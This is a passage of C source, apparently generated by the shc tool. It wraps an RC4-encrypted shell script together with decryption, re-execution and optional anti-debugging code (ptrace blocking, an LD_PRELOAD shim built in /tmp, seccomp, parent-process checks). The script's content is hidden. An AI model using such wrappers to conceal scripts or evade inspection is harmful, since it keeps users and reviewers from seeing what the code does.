	"\063\252\363\131\022\351\164\031\157\343\226\315\252\155\225\016"
	"\330\335\216\067\170\364\117\114\264\344\133\215\244\320\240\035"
	"\302\067\103\052\364\036\222\113\117\244\063\250\032\057\355\345"
	"\163\356\311\000\115\220\213\016\330\233\002\025\301\152\307\232"
	"\376\261\020\060\234\337\145\230\202\313\217\254\147\334\270\162"
	"\166\044\104\267\342\324\204\341\171\030\214\371\040\171\035\076"
	"\034\265\230\315\140\377\157\141\212\224\175\233\155\051\351\370"
	"\215\073\075\326\020\044\350\120\330\177\020\300\175\224\272\174"
	"\372\047\214\152\201\012\276\072\270\346\220\113\175\226\064\260"
	"\236\126\231\174\304\131\007\111\173\246\020\367\207\366\137\246"
	"\022\375\272\012\365\157\060\334\203\300\050\001\127\134\261\365"
	"\262\113\162\166\245\171\300\041\040\321\030\247\307\167\116\331"
	"\165\010\344\152\170\024\107\373\324\157\374\054\313\256\042\176"
	"\372\224\365\237\015\266\300\055\207\331\325\116\120\043\047\305"
	"\054\013\060\245\040\167\240\365\346\235\041\262\114\103\061\106"
	"\330\047\346\346\335\246\024\144\200\351\263\320\015\333\226\072"
	"\347\307\337\007\076\200\374\045\035\036\330\151\142\012\260\072"
	"\061\226\041\016\075\065\163\275\037\047\216\054\002\045\147\351"
	"\354\106\360\053\307\355\121\345\014\051\117\156\064\377\251\145"
	"\225\312\164\323\377\347\220\036\016\037\113\021\104\262\372\060"
	"\371\353\134\300\331\255\245\345\326\364\124\012\364\375\160\212"
	"\310\344\135\310\314\356\346\333\015\062\354\121\345\347\202\336"
	"\322\336\237\254\213\105\221\142\072\345\155\056\343\335\270\253"
	"\301\026\163\216\004\132\151\021\215\126\143\162\075\345\121\017"
	"\303\361\274\117\066\115\261\160\063\036\237\027\374\130\303\276"
	"\156\067\114\162\222\265\204\037\014\347\222\111\314\344\131\220"
	"\325\025\340\013\143\221\174\227\260\034\256\254\164\161\152\343"
	"\251\267\126\073\155\332\133\171\301\355\302\216\321\033\037\246"
	"\060\377\262\223\221\057\052\101\114\331\356\301\113\131\244\364"
	"\020\372\057\175\325\212\366\227\170\270\045\111\324\105\360\004"
	"\105\243\230\327\323\303\031\037\235\007\340\350\140\204\334\161"
	"\177\014\356\124\227\344\353\017\235\021\130\161\126\111\166\234"
	"\354\017\163\300\323\214\337\160\224\277\130\364\104\065\145\303"
	"\102\124\027\331\070\002\350\326\023\101\107\152\213\276\007\167"
	"\315\172\067\240\007\027\021\233\326\152\220\032\237\366\335\342"
	"\112\365\273\203\367\243\131\013\345\241\165\160\137\174\350\054"
	"\367\040\315\376\067\336\232\015\110\052\050\350\040\006\312\152"
	"\373\205\355\363\051\107\376\016\350\164\176\107\361\146\164\350"
	"\207\101\347\276\040\201\314\151\254\364\122\314\373\034\066\366"
	"\242\044\351\314\153\350\333\123\134\131\233\116\300\017\066\107"
	"\121\036\006\162\240\322\333\114\307\055\030\302\112\117\271\355"
	"\163\243\271\337\213\224\063\350\356\316\066\257\336\155\367\060"
	"\213\375\242\054\320\176\170\227\254\221\132\366\341\023\343\125"
	"\266\235\064\102\062\147\052\040\065\140\320\024\315\307\104\131"
	"\304\347\205\225\145\376\054\021\220\206\010\161\232\354\306\120"
	"\211\372\222\273\142\274\334\230\035\254\254\353\163\360\104\070"
	"\330\312\315\075\311\371\117\131\200\127\312\032\103\221\153\315"
	"\213\375\210\356\272\145\206\330\021\062\303\204\043\010\275\373"
	"\322\212\071\233\204\210\365\005\337\277\040\043\120\213\360\334"
	"\211\171\312\104\336\121\034\360\204\337\165\250\347\062\244\272"
	"\275\335\125\102\145\112\110\105\012\150\151\133\363\132\070\174"
	"\323\003\300\262\124\334\242\331\274\027\201\244\112\045\136\007"
	"\002\264\112\150\377\222\256\012\372\030\145\355\162\236\152\106"
	"\241\053\370\366\010\233\317\304\263\121\151\375\166\307\005\171"
	"\174\117\342\173\341\221\205\334\251\353\312\033\211\064\141\053"
	"\137\132\041\150\366\361\054\251\102\226\246\271\135\253\062\332"
	"\373\024\125\335\245\333\271\117\306\203\152\120\270\314\173\030"
	"\047\235\200\035\217\255\306\322\103\155\213\240\031\275\172\024"
	"\322\320\362\170\253\253\307\162\057\062\303\347\376\076\000\045"
	"\334\200\102\154\055\011\076\160\166\311\021\217\207\214\244\132"
	"\134\226\322\010\101\232\173\161\314\076\130\313\175\131\361\131"
	"\331\063\305\006\075\004\167\263\315\210\103\125\025\347\257\162"
	"\175\202\172\276\035\366\057\351\064\210\264\261\341\245\013\273"
	"\331\321\302\027\325\071\312\243\302\015\371\330\364\251\112\162"
	"\053\305\060\111\273\140\062\357\351\347\241\313\215\254\206\147"
	"\175\111\176\123\203\111\366\105\127\357\036\114\230\150\276\304"
	"\055\357\015\350\120\100\330\071\050\171\005\265\046\214\035\244"
	"\325\234\367\130\346\356\236\076\336\274\212\167\045\111\073\122"
	"\071\111\073\211\212\024\303\262\215\310\150\264\124\205\130\051"
	"\042\120\202\010\076\040\106\034\335\321\224\002\033\317\125\124"
	"\031\221\335\243\245\241\126\063\151\276\347\275\104\100\347\146"
	"\220\152\157\317\212\266\353\150\207\200\153\243\117\300\367\151"
	"\122\325\015\367\166\143\052\340\041\022\235\145\122\205\314\342"
	"\357\073\261\172\361\235\343\171\035\116\034\155\017\024\327\141"
	"\351\344\130\140\107\203\100\151\225\336\316\347\143\233\311\123"
	"\326\173\316\307\030\261\101\066\377\135\243\017\161\173\160\133"
	"\137\311\273\246\115\374\020\342\332\336\311\076\171\223\222\120"
	"\017\140\030\050\021\131\136\021\267\002\041\051\175\222\204\335"
	"\133\100\204\250\075\224\213\027\163\125\126\355\350\350\075\370"
	"\111\126\040\132\257\177\154\147\202\215\220\000\037\024\335\173"
	"\125\141\044\222\366\257\252\151\004\001\126\355\352\224\345\063"
	"\352\006\216\232\206\372\001\010\207\221\010\247\246\346\042\374"
	"\107\106\217\075\366\071\247\372\073\376\350\045\222\316\130\175"
	"\324\346\030\132\341\031\143\151\253\153\020\122\122\062\116\231"
	"\171\335\327\157\027\177\152\122\175\122\170\020\040\320\216\365"
	"\267\246\120\231\300\263\002\154\037\022\276\162\105\015\013\277"
	"\353\343\056\002\142\231\125\340\353\315\360\014\236\176\002\126"
	"\044\123\357\345\007\361\121\047\004\017\231\111\034\244\010\007"
	"\210\067\012\353\320\137\313\274\055\273\311\313\072\313\041\137"
	"\036\021\104\045\002\225\114\006\244\345\120\301\212\130\310\023"
	"\220\323\376\141\062\312\035\140\205\347\053\300\262\115\037\321"
	"\136\143\367\141\370\104\147\234\052\267\136\264\020\046\310\240"
	"\372\306\001\054\221\037\215\026\006\270\327\271\006\366\213\145"
	"\131\202\306\121\306\055\356\361\345\114\246\365\163\156\226\155"
	"\065\230\232\306\267\047\335\276\340\264\170\347\252\003\114\004"
	"\206\022\126\115\077\105\076\045\222\344\032\006\122\261\163\210"
	"\111\016\116\001\066\054\300\027\340\070\376\213\073\112\220\301"
	"\134\346\016\234\054\115\301\276\061\334"
#define      opts_z	1
#define      opts	((&data[8154]))
	"\311"
#define      shll_z	10
#define      shll	((&data[8155]))
	"\224\177\246\131\356\170\213\135\316\313\107\133"
#define      tst2_z	19
#define      tst2	((&data[8169]))
	"\230\224\334\312\234\142\364\270\046\155\375\050\211\364\012\104"
	"\313\312\006\315\152\150\321"
#define      chk1_z	22
#define      chk1	((&data[8195]))
	"\335\205\316\071\154\235\151\232\166\302\145\166\300\346\363\271"
	"\314\257\176\106\322\211\034\211\013\110\176"
#define      chk2_z	19
#define      chk2	((&data[8221]))
	"\052\227\126\134\262\075\341\004\224\203\164\250\210\003\070\276"
	"\026\073\177\264\134\062\205\163\033"
#define      pswd_z	256
#define      pswd	((&data[8242]))
	"\000\216\272\127\014\015\015\116\006\056\370\320\107\213\300\242"
	"\264\321\156\324\156\111\245\324\144\112\174\302\002\013\174\002"
	"\232\067\131\246\104\147\364\113\225\355\033\334\170\334\176\054"
	"\255\355\001\034\067\246\361\233\360\155\135\363\171\331\365\024"
	"\020\117\272\125\267\257\240\114\235\274\051\025\230\247\102\106"
	"\225\104\143\314\353\124\147\334\302\304\317\073\236\305\120\257"
	"\024\012\004\314\272\245\030\127\141\101\155\372\351\260\101\176"
	"\364\244\113\340\370\262\274\272\167\214\366\026\121\106\305\146"
	"\121\311\062\014\156\113\144\320\214\321\313\166\201\014\364\166"
	"\260\077\127\251\362\023\144\151\240\132\177\361\241\104\130\363"
	"\016\212\377\175\325\143\116\142\065\031\330\267\046\315\056\327"
	"\015\205\200\377\230\344\151\071\077\350\052\341\055\202\325\074"
	"\015\324\272\343\070\010\105\156\042\036\045\110\353\123\037\370"
	"\330\240\370\161\205\141\252\304\112\325\246\167\130\173\264\146"
	"\120\156\111\210\167\217\366\231\255\034\342\231\157\001\221\110"
	"\242\211\272\047\352\145\354\064\072\222\254\222\015\141\370\135"
	"\355\330\232\110\261\030\320\111\255\071\032\100\056\047\035\263"
	"\366\126\037\324\054"
#define      rlax_z	1
#define      rlax	((&data[8519]))
	"\351"
#define      msg1_z	65
#define      msg1	((&data[8526]))
	"\052\073\071\175\051\022\361\157\152\314\314\272\212\216\036\327"
	"\273\164\114\320\126\036\342\211\177\062\372\032\330\114\045\123"
	"\210\330\127\315\377\302\367\243\334\213\364\205\370\307\227\134"
	"\223\133\233\256\307\363\372\263\207\130\347\124\141\256\002\050"
	"\310\340\075\327\275\372\313\030\162\303"
#define      date_z	1
#define      date	((&data[8594]))
	"\054"
#define      inlo_z	3
#define      inlo	((&data[8595]))
	"\175\034\107"
#define      xecc_z	15
#define      xecc	((&data[8600]))
	"\073\136\155\362\257\027\045\174\146\271\276\370\050\333\331\026"
	"\166\106"
#define      msg2_z	19
#define      msg2	((&data[8618]))
	"\277\066\276\333\310\211\175\057\253\033\326\314\021\036\132\074"
	"\066\024\071\137\173"
#define      lsto_z	1
#define      lsto	((&data[8637]))
	"\175"
#define      tst1_z	22
#define      tst1	((&data[8642]))
	"\260\365\355\331\252\170\241\256\207\365\110\375\010\217\261\302"
	"\356\326\040\164\373\142\346\062\047\231\007\006"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }

	ret = chkenv(argc);
	stte_0();
	 key(pswd, pswd_z);
	arc4(msg1, msg1_z);
	arc4(date, date_z);
	if (date[0] && (atoll(date)<time(NULL)))
		return msg1;
	arc4(shll, shll_z);
	arc4(inlo, inlo_z);
	arc4(xecc, xecc_z);
	arc4(lsto, lsto_z);
	arc4(tst1, tst1_z);
	 key(tst1, tst1_z);
	arc4(chk1, chk1_z);
	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
		return tst1;
	arc4(msg2, msg2_z);
	if (ret < 0)
		return msg2;
	varg = (char **)calloc(argc + 10, sizeof(char *));
	if (!varg)
		return 0;
	if (ret) {
		arc4(rlax, rlax_z);
		if (!rlax[0] && key_with_file(shll))
			return shll;
		arc4(opts, opts_z);
#if HARDENING
	    arc4_hardrun(text, text_z);
	    exit(0);
       /* Seccomp Sandboxing - Start */
       seccomp_hardening();
#endif
		arc4(text, text_z);
		arc4(tst2, tst2_z);
		 key(tst2, tst2_z);
		arc4(chk2, chk2_z);
		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
			return tst2;
		/* Prepend hide_z spaces to script text to hide it. */
		scrpt = malloc(hide_z + text_z);
		if (!scrpt)
			return 0;
		memset(scrpt, (int) ' ', hide_z);
		memcpy(&scrpt[hide_z], text, text_z);
	} else {			/* Reexecute */
		if (*xecc) {
			scrpt = malloc(512);
			if (!scrpt)
				return 0;
			sprintf(scrpt, xecc, me);
		} else {
			scrpt = me;
		}
	}
	j = 0;
#if BUSYBOXON
	varg[j++] = "busybox";
	varg[j++] = "sh";
#else
	varg[j++] = argv[0];		/* My own name at execution */
#endif
	if (ret && *opts)
		varg[j++] = opts;	/* Options on 1st line of code */
	if (*inlo)
		varg[j++] = inlo;	/* Option introducing inline code */
	varg[j++] = scrpt;		/* The script itself */
	if (*lsto)
		varg[j++] = lsto;	/* Option meaning last option */
	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
	while (i < argc)
		varg[j++] = argv[i++];	/* Main run-time arguments */
	varg[j] = 0;			/* NULL terminated array */
#if DEBUGEXEC
	debugexec(shll, j, varg);
#endif
	execvp(shll, varg);
	return shll;
}

int main(int argc, char ** argv)
{
#if SETUID
   setuid(0);
#endif
#if DEBUGEXEC
	debugexec("main", argc, argv);
#endif
#if HARDENING
	hardening();
#endif
#if !TRACEABLE
	untraceable(argv[0]);
#endif
	argv[1] = xsh(argc, argv);
	fprintf(stderr, "%s%s%s: %s\n", argv[0],
		errno ? ": " : "",
		errno ? strerror(errno) : "",
		argv[1] ? argv[1] : "<null>"
	);
	return 1;
}
